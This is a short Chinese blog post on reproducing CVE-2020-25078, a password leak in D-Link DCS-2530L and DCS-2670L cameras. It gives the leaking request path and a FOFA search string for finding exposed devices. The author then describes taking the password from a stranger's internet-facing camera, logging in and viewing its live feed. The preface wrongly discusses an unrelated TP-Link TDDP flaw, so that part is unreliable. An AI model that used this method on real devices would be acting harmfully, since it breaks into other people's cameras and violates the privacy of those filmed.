D-Link DCS-2530L和DCS-2670L监控信息泄露漏洞(CVE-2020-25078)复现

前言

查阅相关资料可知,TDDP协议(TP-LINK Device Debug Protocol) 是TP-LINK申请了专利的一种在UPD通信的基础上设计的协议,而Google安全专家Matthew GarrettTP-Link SR20设备上的TDDP协议文件中发现了一处可造成 “允许来自本地网络连接的任意命令执行” 的漏洞。

原理

CVE-2020-25078可以通过如下URL泄露密码

1
http://xx.xx.xx.xx/config/getuser?index=0

复现

由于手上没有DCS的设备也不好模拟,于是我直接用的fofa搜的IP去打

fofa搜索: app=app="D_Link-DCS-2670L"

[![image-20231221100145549](/picture/D-Link DCS-2530L和DCS-2670L监控信息泄露漏洞(CVE-2020-25078)复现/image-20231221100145549.png)](https://springbird3.oss-cn-chengdu.aliyuncs.com/lianxiang/20221022230518.png)

找到了,于是直接去泄露

[![image-20231221100254982](/picture/D-Link DCS-2530L和DCS-2670L监控信息泄露漏洞(CVE-2020-25078)复现/image-20231221100254982.png)](https://springbird3.oss-cn-chengdu.aliyuncs.com/lianxiang/20221022230518.png)

直接密码就出来了,然后我们直接去登录就行

[![image-20231221100327310](/picture/D-Link DCS-2530L和DCS-2670L监控信息泄露漏洞(CVE-2020-25078)复现/image-20231221100327310.png)](https://springbird3.oss-cn-chengdu.aliyuncs.com/lianxiang/20221022230518.png)

然后图像就出来了,就很恐怖

[![image-20231221100425210](/picture/D-Link DCS-2530L和DCS-2670L监控信息泄露漏洞(CVE-2020-25078)复现/image-20231221100425210.png)](https://springbird3.oss-cn-chengdu.aliyuncs.com/lianxiang/20221022230518.png)